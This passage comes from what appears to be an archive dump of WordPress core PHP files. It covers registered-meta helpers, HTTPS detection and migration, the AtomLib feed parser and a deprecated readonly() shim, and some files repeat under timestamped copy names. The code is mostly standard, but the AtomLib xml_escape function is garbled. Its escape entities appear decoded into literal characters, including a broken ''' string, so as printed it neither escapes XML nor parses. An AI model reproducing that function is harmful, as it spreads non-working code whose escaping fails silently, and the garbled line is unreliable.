if ( ! isset( $defaults[ $sub_type ] ) ) {
return $value;
}
$metadata = $defaults[ $sub_type ];
}
if ( $single ) {
$value = $metadata['default'];
} else {
$value = array( $metadata['default'] );
}
return $value;
}
/**
* Checks if a meta key is registered.
*
* @since 4.6.0
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Metadata key.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return bool True if the meta key is registered to the object type and, if provided,
* the object subtype. False if not.
*/
function registered_meta_key_exists( $object_type, $meta_key, $object_subtype = '' ) {
$meta_keys = get_registered_meta_keys( $object_type, $object_subtype );
return isset( $meta_keys[ $meta_key ] );
}
/**
* Unregisters a meta key from the list of registered keys.
*
* @since 4.6.0
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Metadata key.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return bool True if successful. False if the meta key was not registered.
*/
function unregister_meta_key( $object_type, $meta_key, $object_subtype = '' ) {
global $wp_meta_keys;
if ( ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) {
return false;
}
$args = $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ];
if ( isset( $args['sanitize_callback'] ) && is_callable( $args['sanitize_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
remove_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['sanitize_callback'] );
} else {
remove_filter( "sanitize_{$object_type}_meta_{$meta_key}", $args['sanitize_callback'] );
}
}
if ( isset( $args['auth_callback'] ) && is_callable( $args['auth_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
remove_filter( "auth_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['auth_callback'] );
} else {
remove_filter( "auth_{$object_type}_meta_{$meta_key}", $args['auth_callback'] );
}
}
unset( $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ] );
// Do some clean up.
if ( empty( $wp_meta_keys[ $object_type ][ $object_subtype ] ) ) {
unset( $wp_meta_keys[ $object_type ][ $object_subtype ] );
}
if ( empty( $wp_meta_keys[ $object_type ] ) ) {
unset( $wp_meta_keys[ $object_type ] );
}
return true;
}
/**
* Retrieves a list of registered metadata args for an object type, keyed by their meta keys.
*
* @since 4.6.0
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return array[] List of registered metadata args, keyed by their meta keys.
*/
function get_registered_meta_keys( $object_type, $object_subtype = '' ) {
global $wp_meta_keys;
if ( ! is_array( $wp_meta_keys ) || ! isset( $wp_meta_keys[ $object_type ] ) || ! isset( $wp_meta_keys[ $object_type ][ $object_subtype ] ) ) {
return array();
}
return $wp_meta_keys[ $object_type ][ $object_subtype ];
}
/**
* Retrieves registered metadata for a specified object.
*
* The results include both meta that is registered specifically for the
* object's subtype and meta that is registered for the entire object type.
*
* @since 4.6.0
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object the metadata is for.
* @param string $meta_key Optional. Registered metadata key. If not specified, retrieve all registered
* metadata for the specified object.
* @return mixed A single value or array of values for a key if specified. An array of all registered keys
* and values for an object ID if not. False if a given $meta_key is not registered.
*/
function get_registered_metadata( $object_type, $object_id, $meta_key = '' ) {
$object_subtype = get_object_subtype( $object_type, $object_id );
if ( ! empty( $meta_key ) ) {
if ( ! empty( $object_subtype ) && ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) {
$object_subtype = '';
}
if ( ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) {
return false;
}
$meta_keys = get_registered_meta_keys( $object_type, $object_subtype );
$meta_key_data = $meta_keys[ $meta_key ];
$data = get_metadata( $object_type, $object_id, $meta_key, $meta_key_data['single'] );
return $data;
}
$data = get_metadata( $object_type, $object_id );
if ( ! $data ) {
return array();
}
$meta_keys = get_registered_meta_keys( $object_type );
if ( ! empty( $object_subtype ) ) {
$meta_keys = array_merge( $meta_keys, get_registered_meta_keys( $object_type, $object_subtype ) );
}
return array_intersect_key( $data, $meta_keys );
}
/**
* Filters out `register_meta()` args based on an allowed list.
*
* `register_meta()` args may change over time, so requiring the allowed list
* to be explicitly turned off is a warranty seal of sorts.
*
* @access private
* @since 5.5.0
*
* @param array $args Arguments from `register_meta()`.
* @param array $default_args Default arguments for `register_meta()`.
* @return array Filtered arguments.
*/
function _wp_register_meta_args_allowed_list( $args, $default_args ) {
return array_intersect_key( $args, $default_args );
}
/**
* Returns the object subtype for a given object ID of a specific type.
*
* @since 4.9.8
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object to retrieve its subtype.
* @return string The object subtype or an empty string if unspecified subtype.
*/
function get_object_subtype( $object_type, $object_id ) {
$object_id = (int) $object_id;
$object_subtype = '';
switch ( $object_type ) {
case 'post':
$post_type = get_post_type( $object_id );
if ( ! empty( $post_type ) ) {
$object_subtype = $post_type;
}
break;
case 'term':
$term = get_term( $object_id );
if ( ! $term instanceof WP_Term ) {
break;
}
$object_subtype = $term->taxonomy;
break;
case 'comment':
$comment = get_comment( $object_id );
if ( ! $comment ) {
break;
}
$object_subtype = 'comment';
break;
case 'user':
$user = get_user_by( 'id', $object_id );
if ( ! $user ) {
break;
}
$object_subtype = 'user';
break;
}
/**
* Filters the object subtype identifier.
*
* The dynamic portion of the hook name, `$object_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `get_object_subtype_blog`
* - `get_object_subtype_post`
* - `get_object_subtype_comment`
* - `get_object_subtype_term`
* - `get_object_subtype_user`
*
* @since 4.9.8
*
* @param string $object_subtype Object subtype or empty string to override.
* @param int $object_id ID of the object to get the subtype for.
*/
return apply_filters( "get_object_subtype_{$object_type}", $object_subtype, $object_id );
}
https-detection-20260606083005.php 0000666 00000013341 15224151220 0011756 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
atomlib.php 0000666 00000027625 15224151220 0006716 0 ustar 00 <?php
/**
* Atom Syndication Format PHP Library
*
* @package AtomLib
* @link http://code.google.com/p/phpatomlib/
*
* @author Elias Torres <elias@torrez.us>
* @version 0.4
* @since 2.3.0
*/
/**
* Structure that store common Atom Feed Properties
*
* @package AtomLib
*/
class AtomFeed {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
/**
* Stores Entries
*
* @var array
* @access public
*/
var $entries = array();
}
/**
* Structure that store Atom Entry Properties
*
* @package AtomLib
*/
class AtomEntry {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
}
/**
* AtomLib Atom Parser API
*
* @package AtomLib
*/
class AtomParser {
var $NS = 'http://www.w3.org/2005/Atom';
var $ATOM_CONTENT_ELEMENTS = array('content','summary','title','subtitle','rights');
var $ATOM_SIMPLE_ELEMENTS = array('id','updated','published','draft');
var $debug = false;
var $depth = 0;
var $indent = 2;
var $in_content;
var $ns_contexts = array();
var $ns_decls = array();
var $content_ns_decls = array();
var $content_ns_contexts = array();
var $is_xhtml = false;
var $is_html = false;
var $is_text = true;
var $skipped_div = false;
var $FILE = "php://input";
var $feed;
var $current;
var $map_attrs_func;
var $map_xmlns_func;
var $error;
var $content;
/**
* PHP5 constructor.
*/
function __construct() {
$this->feed = new AtomFeed();
$this->current = null;
$this->map_attrs_func = array( __CLASS__, 'map_attrs' );
$this->map_xmlns_func = array( __CLASS__, 'map_xmlns' );
}
/**
* PHP4 constructor.
*/
public function AtomParser() {
self::__construct();
}
/**
* Map attributes to key="val"
*
* @param string $k Key
* @param string $v Value
* @return string
*/
public static function map_attrs($k, $v) {
return "$k=\"$v\"";
}
/**
* Map XML namespace to string.
*
* @param indexish $p XML Namespace element index
* @param array $n Two-element array pair. [ 0 => {namespace}, 1 => {url} ]
* @return string 'xmlns="{url}"' or 'xmlns:{namespace}="{url}"'
*/
public static function map_xmlns($p, $n) {
$xd = "xmlns";
if( 0 < strlen($n[0]) ) {
$xd .= ":{$n[0]}";
}
return "{$xd}=\"{$n[1]}\"";
}
function _p($msg) {
if($this->debug) {
print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n";
}
}
function error_handler($log_level, $log_text, $error_file, $error_line) {
$this->error = $log_text;
}
function parse() {
set_error_handler(array(&$this, 'error_handler'));
array_unshift($this->ns_contexts, array());
if ( ! function_exists( 'xml_parser_create_ns' ) ) {
trigger_error( __( "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." ) );
return false;
}
$parser = xml_parser_create_ns();
xml_set_element_handler($parser, array($this, "start_element"), array($this, "end_element"));
xml_parser_set_option($parser,XML_OPTION_CASE_FOLDING,0);
xml_parser_set_option($parser,XML_OPTION_SKIP_WHITE,0);
xml_set_character_data_handler($parser, array($this, "cdata"));
xml_set_default_handler($parser, array($this, "_default"));
xml_set_start_namespace_decl_handler($parser, array($this, "start_ns"));
xml_set_end_namespace_decl_handler($parser, array($this, "end_ns"));
$this->content = '';
$ret = true;
$fp = fopen($this->FILE, "r");
while ($data = fread($fp, 4096)) {
if($this->debug) $this->content .= $data;
if(!xml_parse($parser, $data, feof($fp))) {
/* translators: 1: Error message, 2: Line number. */
trigger_error(sprintf(__('XML Error: %1$s at line %2$s')."\n",
xml_error_string(xml_get_error_code($parser)),
xml_get_current_line_number($parser)));
$ret = false;
break;
}
}
fclose($fp);
if (PHP_VERSION_ID < 80000) { // xml_parser_free() has no effect as of PHP 8.0.
xml_parser_free($parser);
}
unset($parser);
restore_error_handler();
return $ret;
}
function start_element($parser, $name, $attrs) {
$name_parts = explode(":", $name);
$tag = array_pop($name_parts);
switch($name) {
case $this->NS . ':feed':
$this->current = $this->feed;
break;
case $this->NS . ':entry':
$this->current = new AtomEntry();
break;
};
$this->_p("start_element('$name')");
#$this->_p(print_r($this->ns_contexts,true));
#$this->_p('current(' . $this->current . ')');
array_unshift($this->ns_contexts, $this->ns_decls);
$this->depth++;
if(!empty($this->in_content)) {
$this->content_ns_decls = array();
if($this->is_html || $this->is_text)
trigger_error("Invalid content in element found. Content must not be of type text or html if it contains markup.");
$attrs_prefix = array();
// resolve prefixes for attributes
foreach($attrs as $key => $value) {
$with_prefix = $this->ns_to_prefix($key, true);
$attrs_prefix[$with_prefix[1]] = $this->xml_escape($value);
}
$attrs_str = join(' ', array_map($this->map_attrs_func, array_keys($attrs_prefix), array_values($attrs_prefix)));
if(strlen($attrs_str) > 0) {
$attrs_str = " " . $attrs_str;
}
$with_prefix = $this->ns_to_prefix($name);
if(!$this->is_declared_content_ns($with_prefix[0])) {
array_push($this->content_ns_decls, $with_prefix[0]);
}
$xmlns_str = '';
if(count($this->content_ns_decls) > 0) {
array_unshift($this->content_ns_contexts, $this->content_ns_decls);
$xmlns_str .= join(' ', array_map($this->map_xmlns_func, array_keys($this->content_ns_contexts[0]), array_values($this->content_ns_contexts[0])));
if(strlen($xmlns_str) > 0) {
$xmlns_str = " " . $xmlns_str;
}
}
array_push($this->in_content, array($tag, $this->depth, "<". $with_prefix[1] ."{$xmlns_str}{$attrs_str}" . ">"));
} else if(in_array($tag, $this->ATOM_CONTENT_ELEMENTS) || in_array($tag, $this->ATOM_SIMPLE_ELEMENTS)) {
$this->in_content = array();
$this->is_xhtml = $attrs['type'] == 'xhtml';
$this->is_html = $attrs['type'] == 'html' || $attrs['type'] == 'text/html';
$this->is_text = !in_array('type',array_keys($attrs)) || $attrs['type'] == 'text';
$type = $this->is_xhtml ? 'XHTML' : ($this->is_html ? 'HTML' : ($this->is_text ? 'TEXT' : $attrs['type']));
if(in_array('src',array_keys($attrs))) {
$this->current->$tag = $attrs;
} else {
array_push($this->in_content, array($tag,$this->depth, $type));
}
} else if($tag == 'link') {
array_push($this->current->links, $attrs);
} else if($tag == 'category') {
array_push($this->current->categories, $attrs);
}
$this->ns_decls = array();
}
function end_element($parser, $name) {
$name_parts = explode(":", $name);
$tag = array_pop($name_parts);
$ccount = count($this->in_content);
# if we are *in* content, then let's proceed to serialize it
if(!empty($this->in_content)) {
# if we are ending the original content element
# then let's finalize the content
if($this->in_content[0][0] == $tag &&
$this->in_content[0][1] == $this->depth) {
$origtype = $this->in_content[0][2];
array_shift($this->in_content);
$newcontent = array();
foreach($this->in_content as $c) {
if(count($c) == 3) {
array_push($newcontent, $c[2]);
} else {
if($this->is_xhtml || $this->is_text) {
array_push($newcontent, $this->xml_escape($c));
} else {
array_push($newcontent, $c);
}
}
}
if(in_array($tag, $this->ATOM_CONTENT_ELEMENTS)) {
$this->current->$tag = array($origtype, join('',$newcontent));
} else {
$this->current->$tag = join('',$newcontent);
}
$this->in_content = array();
} else if($this->in_content[$ccount-1][0] == $tag &&
$this->in_content[$ccount-1][1] == $this->depth) {
$this->in_content[$ccount-1][2] = substr($this->in_content[$ccount-1][2],0,-1) . "/>";
} else {
# else, just finalize the current element's content
$endtag = $this->ns_to_prefix($name);
array_push($this->in_content, array($tag, $this->depth, "</$endtag[1]>"));
}
}
array_shift($this->ns_contexts);
$this->depth--;
if($name == ($this->NS . ':entry')) {
array_push($this->feed->entries, $this->current);
$this->current = null;
}
$this->_p("end_element('$name')");
}
function start_ns($parser, $prefix, $uri) {
$this->_p("starting: " . $prefix . ":" . $uri);
array_push($this->ns_decls, array($prefix,$uri));
}
function end_ns($parser, $prefix) {
$this->_p("ending: #" . $prefix . "#");
}
function cdata($parser, $data) {
$this->_p("data: #" . str_replace(array("\n"), array("\\n"), trim($data)) . "#");
if(!empty($this->in_content)) {
array_push($this->in_content, $data);
}
}
function _default($parser, $data) {
# when does this gets called?
}
function ns_to_prefix($qname, $attr=false) {
# split 'http://www.w3.org/1999/xhtml:div' into ('http','//www.w3.org/1999/xhtml','div')
$components = explode(":", $qname);
# grab the last one (e.g 'div')
$name = array_pop($components);
if(!empty($components)) {
# re-join back the namespace component
$ns = join(":",$components);
foreach($this->ns_contexts as $context) {
foreach($context as $mapping) {
if($mapping[1] == $ns && strlen($mapping[0]) > 0) {
return array($mapping, "$mapping[0]:$name");
}
}
}
}
if($attr) {
return array(null, $name);
} else {
foreach($this->ns_contexts as $context) {
foreach($context as $mapping) {
if(strlen($mapping[0]) == 0) {
return array($mapping, $name);
}
}
}
}
}
function is_declared_content_ns($new_mapping) {
foreach($this->content_ns_contexts as $context) {
foreach($context as $mapping) {
if($new_mapping == $mapping) {
return true;
}
}
}
return false;
}
function xml_escape($content)
{
return str_replace(array('&','"',"'",'<','>'),
array('&','"',''','<','>'),
$content );
}
}
readonly-20260621163111.php 0000666 00000002345 15224151220 0010451 0 ustar 00 <?php
/**
* Conditionally declares a `readonly()` function, which was renamed
* to `wp_readonly()` in WordPress 5.9.0.
*
* In order to avoid PHP parser errors, this function was extracted
* to this separate file and is only included conditionally on PHP < 8.1.
*
* Including this file on PHP >= 8.1 results in a fatal error.
*
* @package WordPress
* @since 5.9.0
*/
/**
* Outputs the HTML readonly attribute.
*
* Compares the first two arguments and if identical marks as readonly.
*
* This function is deprecated, and cannot be used on PHP >= 8.1.
*
* @since 4.9.0
* @deprecated 5.9.0 Use wp_readonly() introduced in 5.9.0.
*
* @see wp_readonly()
*
* @param mixed $readonly_value One of the values to compare.
* @param mixed $current Optional. The other value to compare if not just true.
* Default true.
* @param bool $display Optional. Whether to echo or just return the string.
* Default true.
* @return string HTML attribute or empty string.
*/
function readonly( $readonly_value, $current = true, $display = true ) {
_deprecated_function( __FUNCTION__, '5.9.0', 'wp_readonly()' );
return wp_readonly( $readonly_value, $current, $display );
}
https-detection-20260605114554-20260621081201.php 0000666 00000013341 15224151220 0013335 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260607003752-20260621081107-20260621181056.php 0000666 00000011205 15224151220 0014736 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605170851-20260621081201.php 0000666 00000011205 15224151220 0013347 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
